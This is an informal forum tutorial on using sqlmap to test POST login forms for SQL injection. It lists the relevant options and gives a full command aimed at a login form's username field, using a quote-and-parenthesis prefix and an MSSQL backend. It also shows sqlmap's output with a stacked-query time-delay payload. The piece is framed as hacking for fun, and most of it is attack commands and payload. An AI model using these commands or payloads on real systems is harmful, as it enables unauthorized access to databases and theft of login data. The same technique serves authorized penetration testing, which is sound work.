SQLmap and POSTS , rather than GETS

Hi guys, wats goin on?  hacking on charm? :D
Well, here writing sumthing cool. Giving here a tut for "sqlmap and POST" requests since every most of the tutorials tel u bout the GETS only.. Sounds interesting? Well, n its interesting as well. 
So the options you'll want to use

-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string

--postfix=POSTFIX <-- Injection payload postfix string

--dbms=DBMS <--Force back-end DBMS to this value

*--dbms= if sqlmap is nt working, it sumeitmes irritates. :)

lets assume that we are having a simple POST request.

3ncrypt0r@bt:~/pentest/sqlmap-dev$ python sqlmap.py -u "" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2

--method to pass the POST option

--data to pass the paramaters that are required for the POST

-p to pass the injectable field, so in this case the username field (usernameTxt)

--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query

--dbms to tell it the backend was mssql

this yields us an sqlmap query like so:

Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
Well this is it. try it once and u wud enjoy. :)

have fun.

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